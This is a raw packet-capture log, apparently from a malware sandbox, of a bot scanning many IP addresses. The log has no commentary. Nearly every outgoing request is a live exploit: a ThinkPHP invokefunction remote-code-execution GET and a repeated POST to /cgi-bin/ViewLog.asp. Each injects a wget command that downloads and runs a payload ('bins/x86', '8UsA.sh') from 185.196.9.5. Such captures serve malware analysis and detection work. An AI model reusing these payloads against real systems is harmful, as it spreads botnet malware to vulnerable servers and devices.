Feb 25, 2024 19:05:11.463247061 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:11 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1077	192.168.2.15	41408	95.100.202.25	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.348577023 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:11.536920071 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:05:11 GMT Date: Sun, 25 Feb 2024 18:05:11 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 35 63 61 36 34 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 33 31 31 26 23 34 36 3b 31 63 61 34 61 34 61 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.15ca645f.1708884311.1ca4a4af</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1078	192.168.2.15	58798	31.136.71.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.544167042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:12.164874077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.380884886 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:16.004992008 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:20.868766069 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:30.596724987 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1079	192.168.2.15	54678	94.187.110.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.566988945 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1080	192.168.2.15	58454	94.121.101.216	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.585175991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1081	192.168.2.15	35090	94.122.225.99	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.593130112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1082	192.168.2.15	57840	95.100.27.141	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.611944914 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:11.932446957 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:11 GMT Date: Sun, 25 Feb 2024 18:05:11 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 66 62 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 31 31 26 23 34 36 3b 31 33 30 38 33 33 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2cfb1302.1708884311.1308337</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1083	192.168.2.15	46330	31.40.224.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.804814100 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:12.024648905 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:34:59 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
1084	192.168.2.15	56788	62.29.79.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.807148933 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1085	192.168.2.15	43806	95.86.104.193	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.810991049 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1086	192.168.2.15	32792	31.47.252.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.984060049 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.060889006 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:14.308836937 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:17.028928995 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:22.148813963 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:32.132658005 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1087	192.168.2.15	51336	95.86.98.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.005614042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1088	192.168.2.15	38560	94.123.43.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.024981022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1089	192.168.2.15	50914	112.29.221.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.292088032 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:12.641005039 CET	350	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:12 GMT Content-Type: text/html Content-Length: 205 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 79 64 2d 61 6e 68 75 69 2d 68 75 61 69 6e 61 6e 2d 32 38 2d 31 31 32 2d 32 39 2d 32 32 31 2d 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 